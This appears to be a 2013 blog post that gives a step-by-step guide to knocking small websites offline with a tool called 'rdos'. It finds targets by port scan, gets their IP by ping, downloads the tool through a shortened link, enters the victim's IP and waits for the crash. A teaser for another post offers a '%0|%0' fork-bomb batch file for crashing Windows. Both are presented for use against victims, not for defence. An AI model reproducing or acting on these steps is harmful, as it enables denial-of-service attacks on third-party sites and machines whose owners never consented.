Friday, December 20, 2013

crashing sites with rdos

We will be talking about rdos attack First off all we will have to know about DDOS Attack. DDOS, short for Distributed Denial of Service which is a type of DOS attack where multiple compromised systems which are usually infected with a Trojans which are used to target a single system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the end targeted system and all systems maliciously used and controlled by the hacker in the distributed attack. 
In a DDoS attack, the incoming traffic flooding the victim originates from many different sources  potentially hundreds of thousands or more. This effectively makes it impossible to stop the attack simply by blocking a single IP address; plus, it is very difficult to distinguish legitimate user traffic from attack traffic when spread across so many points of origin.

Today I will be showing how to use RDos to attack small sites. You are probably wondering how it works, It works a lot like a syn-flood, which spins up a whole lot of blank connection attempts to a server. The server must receive these , wait for awhile to see if valid data arrives, then close them. The thing is, because the sender knows the connections are blank (and using things like botnets and such), it can generate a lot more connection attempts than the server can handle. Eventually, the server gets so busy that it fails to respond to real connections.


Find a website which has Port 80 open, this is because of the fact that only websites with open port: 80 are targeted in rdos. You can find websites with the port 80 open with many software programs; I have used Acunetix to scan a website with port 80 open.
After finding the website, obtain its ip address. This can be done by running the cmd and typing there the following text:
                      
                            ping www.yahoo.com

 Hit enter and you will get the ip address of the website.
You can download rdos from here:http://adf.ly/b0El0

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSRycQmSwyKQ6dOCJp3qcErV7YMAFp0eWVPrF4fFJ4uk6vkHVBRg_USYcaCjAWQIl3JNgyTZFv9siYiS9zpFW8yuoN43GPwMFIkFGzM6abShVHG69lmkqhEUCYplDR-9-L0OM4SpuEMXI/s400/Ping.PNG

Then you would open the rdos program and type the victims IP then you would hit enter.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXKze46Da55nuKdemdUHd6eujEmy6Wqk5HBT-1RK9tmlv4i59xEklPFzCAOzF2-JY8qGgiM3xIy5qKvPIMqZ4ClAKX1q6XESH_4GfnvJXtyoZ_LCJqDVvYHhYs-_x3LjchSdd6odVpT3s/s400/RDOS.PNG

 Now you would wait for a while and then you would see it crash.


Enjoy.

No comments:

Post a Comment

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...